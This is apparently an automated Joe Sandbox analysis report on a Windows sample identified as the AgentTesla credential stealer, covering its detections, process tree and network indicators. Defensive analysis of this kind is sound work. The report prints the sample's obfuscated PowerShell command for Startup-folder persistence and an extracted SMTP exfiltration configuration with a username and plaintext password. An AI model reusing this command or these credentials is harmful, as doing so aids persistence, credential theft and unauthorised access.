Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-095325.scr.exe

Overview

General Information

Sample name:PO-095325.scr.exe
Analysis ID:1428828
MD5:93f87d1e11c67dbc47ff98369811e826
SHA1:b407b411806659a874ce20d38b62c891703a4bce
SHA256:16043cbb08a362ab425145ded9447bcc382c2b9c9eb3b570704edabbe4276fea
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO-095325.scr.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\PO-095325.scr.exe" MD5: 93F87D1E11C67DBC47FF98369811E826)
    • powershell.exe (PID: 5500 cmdline: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • svchost.exe (PID: 1268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "zt22@qlststv.com", "Password": "28#75@ts76#V1F8h"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.4466181997.0000000003314000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              4.2.RegAsm.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                4.2.RegAsm.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x33e4d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x33ebf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33f49:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33fdb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x34045:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x340b7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3414d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x341dd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.PO-095325.scr.exe.3949b80.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 3 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe', CommandLine: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-095325.scr.exe", ParentImage: C:\Users\user\Desktop\PO-095325.scr.exe, ParentProcessId: 4424, ParentProcessName: PO-095325.scr.exe, ProcessCommandLine: "Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe', ProcessId: 5500, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1268, ProcessName: svchost.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: PO-095325.scr.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                    Found malware configuration
                    Source: 4.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "zt22@qlststv.com", "Password": "28#75@ts76#V1F8h"}
                    Multi AV Scanner detection for submitted file
                    Source: PO-095325.scr.exeReversingLabs: Detection: 28%
                    Machine Learning detection for sample
                    Source: PO-095325.scr.exeJoe Sandbox ML: detected
                    Source: PO-095325.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: PO-095325.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\AtllasRunp\AtllasRunp\obj\Debug\Bienvenida.pdb source: PO-095325.scr.exe, 00000000.00000002.2032946402.0000000005400000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2056029725.0000000008194000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2053643974.000000000725A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb@70s/ source: powershell.exe, 00000002.00000002.2055885190.000000000815A000.00000004.00000020.00020000.00000000.sdmp

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.ipify.org
                    Source: RegAsm.exe, 00000004.00000002.4466181997.000000000338E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                    Source: powershell.exe, 00000002.00000002.2055731933.0000000008132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: svchost.exe, 00000005.00000002.3638291875.00000214424A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                    Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                    Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                    Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                    Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                    Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: RegAsm.exe, 00000004.00000002.4466181997.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8
                    Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/T4
                    Source: RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/p
                    Source: RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000005.00000003.2028768858.00000214421F0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/sam210723/goesrecv-monitor/releases/latest
                    Source: powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: qmgr.db.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                    Source: PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vksdr.com/goesrecv-monitor
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: PO-095325.scr.exe, KeyHook.cs.Net Code: StartListening
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_028A45600_2_028A4560
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_028ACD3C0_2_028ACD3C
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_028AF5A80_2_028AF5A8
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_028AF5B80_2_028AF5B8
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_04FB77180_2_04FB7718
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_04FB12B70_2_04FB12B7
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_04FBCF500_2_04FBCF50
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_04FB35BC0_2_04FB35BC
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeCode function: 0_2_04FBCF3F0_2_04FBCF3F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01604AC04_2_01604AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_01603EA84_2_01603EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_016041F04_2_016041F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E6B7B44_2_06E6B7B4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E665F84_2_06E665F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E600404_2_06E60040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E684584_2_06E68458
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E6D4284_2_06E6D428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E6D4184_2_06E6D418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E6E11F4_2_06E6E11F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06E68B404_2_06E68B40
                    Source: PO-095325.scr.exe, 00000000.00000002.2028292789.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-095325.scr.exe
                    Source: PO-095325.scr.exe, 00000000.00000002.2032946402.0000000005400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBienvenida.exe6 vs PO-095325.scr.exe
                    Source: PO-095325.scr.exe, 00000000.00000000.2007786745.000000000053A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameESET.exe, vs PO-095325.scr.exe
                    Source: PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBienvenida.exe6 vs PO-095325.scr.exe
                    Source: PO-095325.scr.exe, 00000000.00000002.2029347793.00000000028F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1f940a0d-a27b-4ffe-9f6f-6b985da4c6d6.exe4 vs PO-095325.scr.exe
                    Source: PO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamegoesrecv.dllB vs PO-095325.scr.exe
                    Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegoesrecv.dllB vs PO-095325.scr.exe
                    Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1f940a0d-a27b-4ffe-9f6f-6b985da4c6d6.exe4 vs PO-095325.scr.exe
                    Source: PO-095325.scr.exeBinary or memory string: OriginalFilenameESET.exe, vs PO-095325.scr.exe
                    Source: PO-095325.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: PO-095325.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PO-095325.scr.exe.5290000.3.raw.unpack, ConstellationPanel.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, ConstellationPanel.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-095325.scr.exe.5290000.3.raw.unpack, Symbols.csBase64 encoded string: 'xHpF2m2TxzO3qr4FIuPswPaRZvbKhAgsHoUgVc5c1AMOAI4xiJqOjlkD3YO/6qULkSENmFl3GsolqcGGkZrBbaRXVu7YY+n3wiyv8wS+UHUpwhx/IX6ZerqvTzuOLuRdO08npei7HwfH2wKRuaecB8P/FVecfW9FoWjF1A6O/68O0qK192cnIhUcctWjx/GW8ULXo/Un0WwvyWYxGKqhFtUjf6hQETjLzO/F68/W3GXggNfn4E0tbsHcWJ4Qs9QeauMywyAB+V1+9Uw+hcoLBpcocrYAhSqf6iaaMKaTanR4JlGBlD4IjJQmV1gvQRYmjDXbZawN8IgwRgaI+xcKtFjiFVvuA6CawFF5jzi4mENimIA39OD54y/zMb7idEh4oTy+f+VDOiQ16HbDvRyX1gv6ar2K+vNdRpiEk+FL75Dwi1y2R1DSLLrnXH75cn9Sxxkx16fkjltmZNwZYnnZc0VCbJz5PE8snBKcKUEemoAvDwcgj8rVX1tuhqqeYXrhP1hn6oaUpa8dLV9GkxPvUPm2U2PxYjlaVQk75pkxpaspctI89cBy4lXgWn0XYPaK1+WjxY5j1F5jeSb75FxuowoTWUXfk8j1s2KbANCsBuN3nd5227aIGAKGm+1kHAm/4MePOuLnj7mVqVrGuW9smZZvnluk2n2p0v6RGPmD818=', 